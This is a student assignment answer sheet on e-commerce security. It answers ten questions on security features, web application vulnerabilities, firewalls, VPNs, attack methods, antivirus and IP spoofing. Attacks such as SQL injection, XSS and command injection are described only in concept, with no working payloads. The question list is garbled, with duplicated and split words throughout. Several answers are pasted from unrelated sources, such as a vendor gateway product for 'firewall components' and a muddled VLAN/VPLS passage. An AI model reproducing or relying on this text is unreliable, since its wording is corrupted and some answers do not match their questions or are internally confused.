Mt-23 c: E-commerce, M-commerce & Security
Content
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
E COMMERCE, M COMMERCE MT-23 C Max. Marks – 10 ASSIGNMENT-1 Q.1 Q.1
What hat is is the the need need of Secur ecuriing? ng?
Q.2
What What are are the the thre threat atss and and vulne vulnera rabi bili liti ties es??
Q.3 Q.3
What What are are the the fire firewa wall ll Comp Compon onen ents ts??
Q .4
Explain VPN?
Q.5 Q.5
Expl Explai ain n var varic icis is meth method odss of of att attac acks ks??
Q.6 Q.6
Stat Statee the the anti anti viru viruss tec techn hnol olog ogie ies? s?
Q.7 Q.7
What hat is is IP IP addr addres esss spo sport rtiing? ng?
Q.8 Q.8
Desc Descrribe digi digittal Sign Signat atur ure? e?
Q.9 Q.9
Expl Explai ain n the the pro proce cess ss of Risk Risk Mana Manage geme ment nt??
Q.10
Explai Explain n IP Securi Security ty and and secu securit rity y struc structur ture? e?
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -1-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-1 Security overview In the software industry, security has two different perspectives. In the software development community, it describes the security features of a system. Common security features are ensuring passwords that are at least six characters long and encryption of sensitive data. For software consumers, it is protection against attacks rather than specific features of the system. Your house may have the latest alarm system and windows with bars, but if you leave your doors unlocked, despite the number of security features your system has, it is still insecure. Hence, security is not a number of features, but a system process. The weakest link in the chain determines the security of the system. In this article, we focus on possible attack scenarios in an e-Commerce system system and provid providee prevent preventive ive strate strategie gies, s, includ including ing securi security ty featur features, es, that that you can implement. Security has three main concepts: confidentiality, integrity, and availability.
Confidentiality allows only authorized parties to read protected information.
Security features While security features do not guarantee a secure system, they are necessary to build a secure system. Security features have four categories: Authentication: Verifies who you say you are. It enforces that you are the only one allowed to logon to your Internet banking account. Authorization: Allows only you to manipulate your resources in specific ways. This prevents you from increasing the balance o f your account or deleting a bill. Encryption: Deals with information hiding. It ensures you cannot spy on others during Internet banking transactions. Auditing: Keeps a record of operations. Merchants use auditing to prove that you bought a specific merchandise. •
•
•
•
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -2-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Defenses Despite the existence of hackers and crackers, e-Commerce remains a safe and secure activity. The resources available to large companies involved in e-Commerce are enormous. Install personal firewalls for the client machines. Store confidential information in encrypted form. Encrypt the stream using the Secure Socket Layer (SSL) protocol to protect information flowing between the client and the e-Commerce Web site. Use appropriate password policies, firewalls, and routine external security audits. Use threat model analysis, strict development policies, and external security audits to protect ISV software running the Web site. Education Your system is only as secure as the people who use it. If a shopper chooses a weak password, or does not keep their password confidential, then an attacker can pose as that user. This is significant if the compromised password belongs to an administrator of the system. In this case, there is likely physical security involved because the administrator client may not be exposed outside the firewall. Users need to use good judgement when giving out information, and be educated about possible phishing schemes and other social engineering attacks. Personal firewalls When connecting your computer to a network, it becomes vulnerable to attack. A personal firewall helps protect your computer by limiting the types of traffic initiated by and directed to your computer. The intruder can also scan the hard drive to detect any stored passwords. Secure Socket Layer (SSL) is a protocol that encrypts data between the shopper's computer and the site's server. When an SSL-protected page is requested, the browser identifies the server as a trusted entity and initiates a handshake to pass encryption key information back and forth. Now, on subsequent requests to the server, the information flowing back and forth is encrypted so that a hacker sniffing the network cannot read the contents. Secure icon in Mozilla Firefox • • •
• •
Secure
icon
in
Microsoft
Internet
Server firewalls A firewall is like the moat surrounding a castle. It ensures that requests can only enter the system from specified ports, and in some cases, ensures that all accesses are only from certain physical machines. A common technique is to setup a demilitarized zone (DMZ) using two firewalls. The outer firewall has ports open that allow ingoing and outgoing HTTP requests. This allows the client browser to communicate with the server. A second firewall sits behind the eCommerce servers. This firewall is heavily fortified, and only requests from trusted MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -3-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY servers on specific ports are allowed through. Both firewalls use intrusion detection software to detect any unauthorized access attempts. Another common technique used in conjunction with a DMZ is a honey pot server. A honey pot is a resource (for example, a fake payment server) placed in the DMZ to fool the hacker into thinking he has penetrated the inner wall. These servers are closely monitored, and any access by an attacker is detected. You may choose to have different policies for shoppers versus your internal users. For example, you may choose to lockout an administrator after 3 failed login attempts instead of 6. These password policies protect against attacks that attempt to guess the user's password. They ensure that passwords are sufficiently strong enough so that they cannot be easily guessed. The account lockout capability ensures that an automated scheme cannot make more than a few guesses before the account is locked. Intrusion detection and audits of security logs If a shopper makes 6 failed logon attempts, then his account is locked out. In this scenario, the company sends an email to the customer, informing them that his account is locked. This event should also be logged in the system, either by sending an email to the administrator, writing the event to a security log, or both. You should also log any attempted unauthorized access to the system. If a user logs on, and attempts to access resources that he is not entitled to see, or performs actions that he is not entitled to perform, then this indicates the account has been co-opted and should be locked out. Analysis of the security logs can detect patterns of suspicious behavior, allowing the administrator to take action. In addition to security logs, use business auditing to monitor activities such as payment processing. You can monitor and review these logs to detect patterns of inappropriate interaction at the business process level.
A-2 Common Security Vulnerabilities in e-commerce Systems: 1. Introduction The tremendous increase in online transactions has been accompanied by an equal rise in the number and type of attacks against the security of online payment systems. Some of these attacks have utilized vulnerabilities that have been published in reusable third-party components utilized by websites, such as shopping cart software. Other attacks have used vulnerabilities that are common in any web application, such as SQL injection or cross-site
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -4-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY scripting. This article discusses these vulnerabilities with examples, either from the set of known vulnerabilities, or those discovered during the author's penetration testing assignments. The different types of vulnerabilities discussed here are SQL injection, crosssite scripting, information disclosure, path disclosure, price manipulation, and buffer overflows. Successful exploitation of these vulnerabilities can lead to a wide range of results. Information and path disclosure vulnerabilities will typically act as initial stages leading to further exploitation. SQL injection or price manipulation attacks could cripple the website, compromise confidentiality, and in worst cases cause the e-commerce business to shut down completely. Wherever examples of such vulnerabilities are given in advisories published by Bugtraq, we have given the Bugtraq ID in square brackets. Details of the vulnerability may be viewed by navigating to http://www.securityfocus.com/bid/<bid_number> . 2. Vulnerabilities 2.1 Background There are a number of reasons why security vulnerabilities arise in shopping cart and online payment systems. The reasons are not exclusive to these systems, but their impact becomes much greater simply because of the wide exposure that an online website has, and because of the financial nature of the transactions. One of the main reasons for such vulnerabilities is the fact that web application developers are often not very well versed with secure programming techniques. As a result, security of the application is not necessarily one of the design goals. This is exacerbated by the rush to meet deadlines in the fast-moving e-commerce world. Even one day's delay in publishing a brand new feature on your website could allow a competitor to steal a march over you. We've typically found this in cases where e-commerce sites need to add functionality rapidly to deal with a sudden change in the business environment or simply to stay ahead o f the competition. In such a scenario, the attitude is to get the functionality online; security can always be taken care of later. Another reason why security vulnerabilities appear is because of the inherent complexity in most online systems. Nowadays, users are placing very demanding requirements on their e-commerce providers, and this requires complex designs and programming logic. 2.2 SQL Injection SQL injection refers to the insertion of SQL meta-characters in user input, such that the attacker's queries are executed by the back-end database. Typically, attackers will first determine if a site is vulnerable to such an attack by sending in the single-quote (') character. The results from an SQL injection attack on a vulnerable site may range from a detailed error message, which discloses the back-end technology being used, or allowing the attacker to access restricted areas of the site because he manipulated the query to an always-true Boolean value, or it may even allow the execution of operating system commands. SQL injection techniques differ depending on the type of database being used. For instance, SQL injection on an Oracle database is done primarily using the UNION keyword [ref 1] and is much more difficult than on the MS SQL Server, where multiple queries can be executed by separating them with the semi-colon [ref 2]. In its default configuration, MS SQL server runs with Local System privileges and has the 'xp_cmdshell' extended procedure, which
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -5-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY allows execution of operating system commands. The most publicized occurrences of this vulnerability were on the e-commerce sites of Guess.com and PetCo.com. 2.3 Price Manipulation This is a vulnerability that is almost completely unique to online shopping carts and payment gateways. In the most common occurrence of this vulnerability, the total payable price of the purchased goods is stored in a hidden HTML field of a dynamically generated web page. An attacker can use a web application proxy such as Achilles [ref 5] to simply modify the amount that is payable, when this information flows from the user's browser to the web server. Shown below is a snapshot of just such a vulnerability that was discovered in one of the author's penetration testing assignments. 2.4 Buffer overflows Buffer overflow vulnerabilities are not very common in shopping cart or other web applications using Perl, PHP, ASP, etc. However, sending in a large number of bytes to web applications that are not geared to deal with them can have unexpected consequences. In one of the author's penetration testing assignments, it was possible to disclose the path of the PHP functions being used by sending in a very large value in the input fields. As the sanitized snapshot below shows, when 6000 or more bytes were fed into a particular field, the back-end PHP script was unable to process them and the error that was displayed revealed the location of these PHP functions. Multiple buffer overflows were also discovered in the PDGSoft Shopping Cart [ bid 1256], which potentially allowed the attacker to execute code of his choice by over-writing the saved return address. 2.5 Cross-site scripting The Cross-site Scripting (XSS) [ref 6] attack is primarily targeted against the end user and leverages two factors: 1. The lack of input and output validation being done by the web application 2. The trust placed by the end-user in a URL that carries the vulnerable web site's name. The XSS attack requires a web form that takes in user input, processes it, and prints out the results on a web page, which also contains the user's original input. It is most commonly found in 'search' features, where the search logic will print out the results along with a line such as 'Results for <user_supplied_input>'. In this case, if the user input is printed out without being parsed, then an attacker can embed JavaScript by supplying it as part of the input. By crafting a URL, which contains this JavaScript, a victim can be social engineered into clicking on it, and the script executes on the victim's system. In most cases, the attacker would craft the URL in order to try and steal the user's cookie, which would probably contain the session ID and other sensitive information. The JavaScript could also be coded to redirect the user to the attacker's website where malicious code could be launched using ActiveX controls or by utilizing browser vulnerabilities such as those in Internet Explorer or Netscape Navigator. However, the JavaScript can also be used to redirect the user to a site that looks similar to the original web site and requests the user to enter sensitive information such as his authentication details for that web site, or his credit card number or social security number. A related attack is shown below:
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -6-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
2.6 Remote command execution The most devastating web application vulnerabilities occur when the CGI script allows an attacker to execute operating system commands due to inadequate input validation. This is most common with the use of the 'system' call in Perl and PHP scripts. Using a command separator and other shell metacharacters, it is possible for the attacker to execute commands with the privileges of the web server. For instance, Hassan Consulting's Shopping Cart allowed remote command execution [ bid 3308], because shell metacharacters such as |;& were not rejected by the software. However, directory traversal was not possible in this software. 2.7 Weak Authentication and Authorization Authentication mechanisms that do not prohibit multiple failed logins can be attacked using tools such as Brutus [ref 8]. Similarly, if the web site uses HTTP Basic Authentication or does not pass session IDs over SSL (Secure Sockets Layer), an attacker can sniff the traffic to discover user's authentication and/or authorization credentials. Since HTTP is a stateless protocol, web applications commonly maintain state using session IDs or transaction IDs stored in a cookie on the user's system. Thus this session ID becomes the only way that the web application can determine the online identity of the user. 3. Countermeasures The most important point is to build security into the web application at the design stage itself. In fact, one of the key activities during the design phase should be a detailed risk assessment exercise. Here, the team must identify the key information assets that the web application will be dealing with. These could include configuration information, user transaction details, session IDs, credit card numbers, etc. Each of these information assets needs to be classified in terms of sensitivity. Depending upon the tentative architecture chosen, the developers along with security experts must analyze the threats, impact, vulnerabilities and threat probabilities for the system. Once these risks are listed out, system countermeasures must be designed and if necessary the architecture itself may be modified. Countermeasures should also include strict input validation routines, a 3-tier modular architecture, use of open-source cryptographic standards, and other secure coding practices.
Ecommerce Threats ECommerce has forever revolutionized the way business is done. Retail has now a long way from the days of physical transactions that were time consuming and prone to errors. However, eCommerce has unavoidably invited its share of trouble makers. As much as eCommerce simplifies transactions, it is occasionally plagued by serious concerns that jeopardize its security as a medium of exchanging money and information. Major threats to present day eCommerce include Breach of Security: Money Thefts eCommerce services are about transactions, and transactions are very largely driven by money. This attracts hackers, crackers and everyone with the knowledge of exploiting loopholes in a system. Once a kink in the armor is discovered, they feed the system(and MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -7-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY users) with numerous bits of dubious information to extract confidential data(phishing). This is particularly dangerous as the data extracted may be that of credit card numbers, security passwords, transaction details etc. Also, Payment gateways are vulnerable to interception by unethical users. Cleverly crafted strategies can sift a part or the entire amount being transferred from the user to the online vendor. Identity thefts Hackers often gain access to sensitive information like user accounts, user details, addresses, confidential personal information etc. It is a significant threat in view of the privileges one can avail with a false identity. For instance, one can effortlessly login to an online shopping mart under a stolen identity and make purchases worth thousands of dollars. He/she can then have the order delivered to an address other than the one listed on the records. One can easily see how those orders could be received by the impostor without arousing suspicion. While the fraudsters gains, the original account holder continues to pay the price until the offender is nabbed. Threats to the system Viruses, worms, Trojans are very deceptive methods of stealing information. Unless a sound virus-protection strategy is used by the eCommere Solutions firm, these malicious agents can compromise the credibility of all eCommerce web solution services. Often planted by individuals for reasons known best to them alone, viruses breed within the systems and multiply at astonishing speeds. Unchecked, they can potentially cripple the entire system. Solutions Authentication Most notable are the advances in identification and elimination of non-genuine users. Ecommerce service designers now use multi-level identification protocols like security questions, encrypted passwords(Encryption), biometrics and others to confirm the identity of their customers. These steps have found wide favor all around due to their effectiveness in weeding out unwelcome access. Intrusion Check The issue of tackling viruses and their like has also seen rapid development with antivirus vendors releasing strong anti-viruses. These are developed by expert programmers who are a notch above the hackers and crackers themselves. Firewalls are another common way of implementing security measures. These programs restrict access to and from the system to pre-checked users/access points. Educating Users eCommerce is run primarily by users. Thus, eCommerce service providers have also turned to educating users about safe practices that make the entire operation trouble free. Recent issues like phishing have been tackled to a good extent by informing genuine users of the perils of publishing their confidential information to unauthorized information seekers.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -8-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY
A-3 Firewall components A built-in firewall is provided for scenarios where servers (managers) are separated from destination clients (agents) by one or more intermediary networks because of firewall policies or address space concerns. The firewall components are used to tunnel traffic between network zones, and can be chained together to allow for multiple hops.
The firewall components are intended to be used with the scalable distribution infrastructure. It does not allow communication between the provisioning server and the common agent using the port number 9510 for any provisioning workflow that you want to run. If your scenario requires a provisioning workflow to communicate with the common agent, then the provisioning server must be able to communicate with the common agent using the listening port (9510 by default) or an alternative protocol. The following graphic is a high-level, functional overview of the firewall components:
1. An agent connects to gateway service and sends command to connect to the Agent Manager on the provisioning server. 2. The gateway service sends a command to gateway manager. 3. The gateway manager creates connection to manager. 4. The gateway creates a connection to the gateway service using the proxy relay. 5. The gateway manager ties connections 3 and 4 to form a virtual connection from the manager to the gateway service.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY -9-
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY 6. The gateway service ties connections 4 and 6 to form a virtual connection from the manager to the agent. Proxy relay The firewall components operate by opening default port 1960 on the proxy relay system, and then listening on this port for routed traffic. When a connection is made to this port, the proxy relay expects control information to be sent, which instructs the relay to create a new TCP/IP connection to the specified address and port. Once the new connection is created, the two input and output stream connections are joined together using a thread that reads data from an input stream and writes data to another output stream. Each proxy relay is configured with an access control list (ACL) which determines which incoming and outgoing connections to allow. Gateway manager and service The gateway includes the gateway manager and the gateway service. The gateway is used to tunnel TCP/IP traffic from point 1 through the gateway service and gateway manager to the final destination 2. Each gateway manager can connect to and manage one or more gateway services. In turn, each gateway service can be managed by one or more gateway managers. For gateway communications, all connections are created from the gateway manager to the gateway service.
For example, a target computer must create a TCP/IP connection to a resource (2). Because of unidirectional firewall rules, connections can only originate from the network where the resource (2) resides. Using the gateway, the target computer (1) creates a connection to the gateway service (3), which is allowed, as they are in the same network. A gateway manager (4) creates a connection to a resource (2), which resides in the same network. Next, the gateway manager (4) creates a new connection to the gateway service (3). Then, using the input and output streams, the original connection from the target computer (1) to the gateway service (3) acts as though it is connected directly to the resource (2). When the gateway manager and gateway service MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 10 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY are operating correctly, there is a persistent TCP/IP from the gateway manager to the gateway service. This “command channel” enables the gateway service to alert the gateway manager when it receives a new connection request. A periodic “heartbeat” signal is sent to keep the connection alive. If the “command channel” is closed, the gateway manager will attempt to reconnect periodically. The gateway service will automatically stop listening on that particular gateway manager's service ports when the connection is broken. The gateway service can be configured to advertise a particular service. To use this feature, user datagram protocol (UDP) broadcasting must be enabled for the local subnet. A target computer can discover a service by sending a broadcast UDP packet containing the service's name. If the gateway service receives the UDP packet and it currently advertises that service name, then it will respond back with an addressed UDP packet which contains the port number that service is listening on. The target computer can then use the source address of the UDP packet and the port contained within the packet to connect to the given service. Configuring the firewall components : The following procedures are required to configure the firewall components, including setting up the gateway manager, starting the gateway service and gateway manager, and enabling the firewall support for the common agent.
A-4 A virtual private network (VPN) is a computer network that is implemented in an additional software layer (overlay) on top of an existing larger network for the purpose of creating a private scope of computer communications or providing a secure extension of a private network into an insecure network such as the Internet. The links between nodes of a virtual private network are formed over logical connections or virtual circuits between hosts of the larger network. The Link Layer protocols of the virtual network are said to be tunneled through the underlying transport network. One common application is to secure communications through the public Internet, but a VPN does not need to have explicit security features such as authentication or traffic encryption. For example, VPNs can also be used to separate the traffic of different user communities over an underlying network with strong security features, or to provide access to a network via customized or private routing mechanisms.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 11 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY VPNs are often installed by organizations to provide remote access to a secure organizational network. Generally, a VPN has a network topology more complex than a point-to-point connection. VPNs are also used to mask the IP address of individual computers within the Internet in order, for instance, to surf the World Wide Web anonymously or to access location restricted services, such as Internet television.
Virtual private wire and private line services (VPWS and VPLS) In both of these services, the provider does not offer a full routed or bridged network, but components from which the customer can build customer-administered networks. VPWS are point-to-point while VPLS can be point-to-multipoint. They can be Layer 1 emulated circuits with no data link structure. The customer determines the overall customer VPN service, which also can involve routing, bridging, or host network elements. An unfortunate acronym confusion can occur between Virtual Private Line Service and Virtual Private LAN Service; the context should make it clear whether "VPLS" means the layer 1 virtual private line or the layer 2 virtual private LAN.
Virtual LAN A Layer 2 technique that allows for the coexistence of multiple LAN broadcast domains, interconnected via trunks using the IEEE 802.1Q trunking protocol. Other trunking protocols have been used but have become obsolete, including Inter-Switch Link (ISL), IEEE 802.10 (originally a security protocol but a sub set was introduced for trunking), and ATM LAN Emulation (LANE).
Virtual private LAN service (VPLS) Developed by IEEE, VLANs allow multiple tagged LANs to share common trunking. VLANs frequently comprise only customer-owned facilities. The former [clarification needed] is a layer 1 technology that supports emulation of both point-to-point and point-to-multipoint topologies. The method discussed here extends Layer 2 technologies such as 802.1d and 802.1q LAN trunking to run over transports such as Metro Ethernet. As used in this context, a VPLS is a Layer 2 PPVPN, rather than a private line, emulating the full functionality of a traditional local area network (LAN). From a user standpoint, a VPLS makes it possible to interconnect several LAN segments over a packet-switched, or optical, provider core; a core transparent to the user, making the remote LAN segments behave as one single LAN. In a VPLS, the provider network emulates a learning bridge, which optionally may include VLAN service. Categorizing VPN security models From the security standpoint, VPNs either trust the underlying delivery network, or must enforce security with mechanisms in the VPN itself. Unless the trusted delivery network runs only among physically secure sites, both trusted and secure models need an authentication mechanism for users to gain access to the VPN. Some Internet service providers as of 2009 offer managed VPN service for business customers who want the security and convenience of a VPN but prefer not to undertake administering a VPN server themselves. Managed VPNs go beyond PPVPN scope, and
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 12 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY are a contracted security solution that can reach into hosts. In addition to providing remote workers with secure access to their employer's internal network, other security and management services are sometimes included as part of the package. Examples include keeping anti-virus and anti-spyware programs updated on each client's computer. Mobile virtual private network Mobile VPNs apply standards-based authentication and encryption technologies to secure communications with mobile devices and to protect networks from unauthorized users. Designed for wireless environments, Mobile VPNs provide an access solution for mobile users who require secure access to information and applications over a variety of wired and wireless networks. Mobile VPNs allow users to roam seamlessly across IP-based networks and in and out of wireless-coverage areas without losing application sessions or dropping the secure VPN session. For instance, highway patrol officers require access to mission-critical applications as they travel between different subnets of a mobile network, much as a cellular radio has to hand off its link to repeaters at different cell towers. The Host Identity Protocol (HIP), under study by the Internet Engineering Task Force, is designed to support mobility of hosts by separating the role of IP addresses for host identification from their locator functionality in an IP network. With HIP a mobile host maintains its logical connections established via the host identity identifier while associating with different IP addresses when roaming between access n etworks.
A-5 Attacks Attack methods from an attacker or hacker. Tricking the shopper Some of the easiest and most profitable attacks are based on tricking the shopper, also known as social engineering techniques. These attacks involve surveillance of the shopper's behavior, gathering information to use against the shopper. For example, a mother's maiden name is a common challenge question used by numerous sites. If one of these sites is tricked into giving away a password once the challenge question is provided, then not only has this site been compromised, but it is also likely that the shopper used the same logon ID and password on other sites.
A common scenario is that the attacker calls the shopper, pretending to be a representative from a site visited, and extracts information. The attacker then calls a
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 13 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY customer service representative at the site, posing as the shopper and providing personal information. The attacker then asks for the password to be reset to a specific value. Another common form of social engineering attacks are phishing schemes. Typo pirates play on the names of famous sites to collect authentication and registration information. For example, http://www.ibm.com/shop is registered by the attacker as www.ibn.com/shop. A shopper mistypes and enters the illegitimate site and provides confidential information. Alternatively, the attacker sends emails spoofed to look like they came from legitimate sites. The link inside the email maps to a rogue site that collects the information. Snooping the shopper's computer Millions of computers are added to the Internet every month. Most users' knowledge of security vulnerabilities of their systems is vague at best. Additionally, software and hardware vendors, in their quest to ensure that their products are easy to install, will ship products with security features disabled. In most cases, enabling security features requires a non-technical user to read manuals written for the technologist. The confused user does not attempt to enable the security features. This creates a treasure trove for attackers. A popular technique for gaining entry into the shopper's system is to use a tool, such as SATAN, to perform port scans on a computer that detect entry points into the machine. Based on the opened ports found, the attacker can use various techniques to gain entry into the user's system. Upon entry, they scan your file system for personal information, such as passwords. While software and hardware security solutions available protect the public's systems, they are not silver bullets. A user that purchases firewall software to protect his computer may find there are conflicts with other software on his system. To resolve the conflict, the user disables enough capabilities to render the firewall software useless. Sniffing the network In this scheme, the attacker monitors the data between the shopper's computer and the server. He collects data about the shopper or steals personal information, such as credit card numbers. There are points in the network where this attack is more practical than others. If the attacker sits in the middle of the network, then within the scope of the Internet, this attack becomes impractical. A request from the client to the server computer is broken up into small pieces known as packets as it leaves the client's computer and is reconstructed at the server. The packets of a request is sent through different routes. The attacker cannot access all the packets of a request and cannot decipher what message was sent.
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 14 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Figure
4.
Attacker
sniffing
the
network
between
client
and
server
Guessing passwords Another common attack is to guess a user's password. This style of attack is manual or automated. Manual attacks are laborious, and only successful if the attacker knows something about the shopper. For example, if the shopper uses their child's name as the password. Automated attacks have a higher likelihood of success, because the probability of guessing a user ID/password becomes more significant as the number of tries increases. Tools exist that use all the words in the dictionary to test user ID/password combinations, or that attack popular user ID/password combinations. The attacker can automate to go against multiple sites at one time. Using denial of service attacks The denial of service attack is one of the best examples of impacting site availability. It involves getting the server to perform a large number of mundane tasks, exceeding the capacity of the server to cope with any other task. For example, if everyone in a large meeting asks you your name all at once, and every time you answer, they ask you again. You have experienced a personal denial of service attack. To ask a computer its name, you use ping. You can use ping to build an effective DoS attack. The smart hacker gets the server to use more computational resources in processing the request than the adversary does in generating the request. Distributed DoS is a type of attack used on popular sites, such as Yahoo! In this type of attack, the hacker infects computers on the Internet via a virus or other means. The infected computer becomes slaves to the hacker. Denial of service attacks:
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 15 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Using known server bugs The attacker analyzes the site to find what types of software are used on the site. He then proceeds to find what patches were issued for the software. Additionally, he searches on how to exploit a system without the patch. He proceeds to try each of the exploits. The sophisticated attacker finds a weakness in a similar type of software, and tries to use that to exploit the system. This is a simple, but effective attack. With millions of servers online, what is the probability that a system administrator forgot to apply a patch? Using server root exploits Root exploits refer to techniques that gain super user access to the server. This is the most coveted type of exploit because the possibilities are limitless. When you attack a shopper or his computer, you can only affect one individual. With a root exploit, you gain control of the merchants and all the shoppers' information on the site. There are two main types of root exploits: buffer overflow attacks and executing scripts against a server. In a buffer overflow attack, the hacker takes advantage of specific type of computer program bug that involves the allocation of storage during program execution. The technique involves tricking the server into execute code written by the attacker. The other technique uses knowledge of scripts that are executed by the server. This is easily and freely found in the programming guides for the server. The attacker tries to construct scripts in the URL of his browser to retrieve information from his server. This technique is frequently used when the attacker is trying to retrieve data from the server's database.
A-6 Antivirus Technologies Acomputer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. The term virus is often extended to refer to computer worms and other sorts of malware. The most common are: Viruses - A virus is a small piece of software that piggybacks on other programs or files. Each time the program runs or file opens, the virus runs, too. It can reproduce itself by attaching to other programs or files or wreak havoc. E-mail viruses - An e-mail virus moves around in e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Pharmers send e-mails contains a virus that installs small software programs on users' computers. When a user tries to go to the bank's real Web site, the program redirects the browser to the pharmer's fake site. It then asks •
•
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 16 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY a user to update information such as logons, PIN codes or other sensitive information. Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well. Trojan horses - A Trojan horse is simply a computer program, which claims to do one thing but instead does damage such as erase your hard disk when you run it. Trojan horses have no way to replicate automatically. Anti-virus software and other countermeasures There are many anti-virus software products svailable that can detect and eliminate known viruses. Some virus scanners can also warn a user if a file is likely to contain a virus based on the file type. Some antivirus vendors also claim the effective use of other types of heuristic analysis, which work by examining the contents of the computer's memory (its RAM, and boot sector) and the files stored on fixed or removable drives (hard drives, floppy drives), and comparing those files against a database of known virus "signatures". Some anti-virus programs are able to scan opened files in addition to sent and received emails 'on the fly' in a similar manner. This practice is known as "on-access scanning." Anti-virus software typically does not change the underlying capability of host software to transmit viruses. Anti-virus software must be updated regularly for the latest threats and hoaxes. Antivirus software typically has the host based version for individual PCs and workstations and the gateway version to protect a network or a subnetwork. Now, antivirus technologies are often combined with other technologies such as anti-spam, anti-spyware, firewalls and intrusion detections to provide broader protection to end users. Anti-virus systems are trationally software solutions. When one system is performing mutiple functions such as scanning virus, spam, spyware and detect and blocking intrusions, the performance becomes one of the main concerns. To increase performance of such integrated gateways and reduce delay of message passing though, many integrated gateway products are migrating from pure software products to a combination of hardware and software. Now, many integrated gateways have achieved line speed at the gigabit or multi-gagabit level. •
•
A-7 In computer networking, the term IP address spoofing or IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged source IP address, called MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 17 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system. Background The basic protocol for sending data over the Internet network and many other computer networks is the Internet Protocol ("IP"). The header of each IP packet contains, among other things, the numerical source and destination address of the packet. The source address is normally the address that the packet was sent from. By forging the header so it contains a different address, an attacker can make it appear that the packet was sent by a different machine. The machine that receives spoofed packets will send response back to the forged source address, which means that this technique is mainly used when the attacker does not care about the response or the attacker has some way of guessing the response. In certain cases, it might be possible for the attacker to see or redirect the response to his own machine. The most usual case is when the attacker is spoofing an address on the same LAN or WAN. Hence the hackers have an unauthorized access over computers. Applications IP spoofing is most frequently used in denial-of-service attacks. In such attacks, the goal is to flood the victim with overwhelming amounts of traffic, and the attacker does not care about receiving responses to the attack packets. Packets with spoofed addresses are thus suitable for such attacks. They have additional advantages for this purpose—they are more difficult to filter since each spoofed packet appears to come from a different address, and they hide the true source of the attack. Denial of service attacks that use spoofing typically randomly choose addresses from the entire IP address space, though more sophisticated spoofing mechanisms might avoid unroutable addresses or unused portions of the IP address space. The proliferation of large botnets makes spoofing less important in denial of service attacks, but attackers typically have spoofing available as a tool, if they want to use it, so defenses against denial-of-service attacks that rely on the validity of the source IP address in attack packets might have trouble with spoofed packets. Backscatter , a technique used to observe denial-of-service attack activity in the Internet, relies on attackers' use of IP spoofing for its effectiveness. IP spoofing can also be a method of attack used by network intruders to defeat network security measures, such as authentication based on IP addresses. This method of attack on a remote system can be extremely difficult, as it involves modifying thousands of packets at a time. This type of attack is most effective where trust relationships exist between machines. For example, it is common on some corporate networks to have internal systems trust each other, so that users can log in without a username or password provided they are connecting from another machine on the internal network (and so must already be logged in). By spoofing a connection from a trusted machine, an attacker may be able to access the target machine without an authentication. Another more-recent use is to change a computer's country of origin for the purposes of accessing internet content limited to specific geopolitical areas. For example, Hulu's online-tv service can only be accessed by American residents, but theoretically also by computers spoofing american locations. Services vulnerable to IP spoofing Configuration and services that are vulnerable to IP spoofing: RPC (Remote Procedure Call services) •
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY - 18 -
MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY Any service that uses IP address authentication The X Window system The R services suite (rlogin, rsh, etc.) Defense against spoofing Packet filtering is one defense against IP spoofing attacks. The gateway to a network usually performs ingress filtering, which is blocking of packets from outside the network with a source address inside the network. This prevents an outside attacker spoofing the address of an internal machine. Ideally the gateway would also perform egress filtering on outgoing packets, which is blocking of packets from inside the network with a source address that is not inside. This prevents an attacker within the network performing filtering from launching IP spoofing attacks against external machines. It is also recommended to design network protocols and services so that they do not rely on the IP source address for authentication. • • •
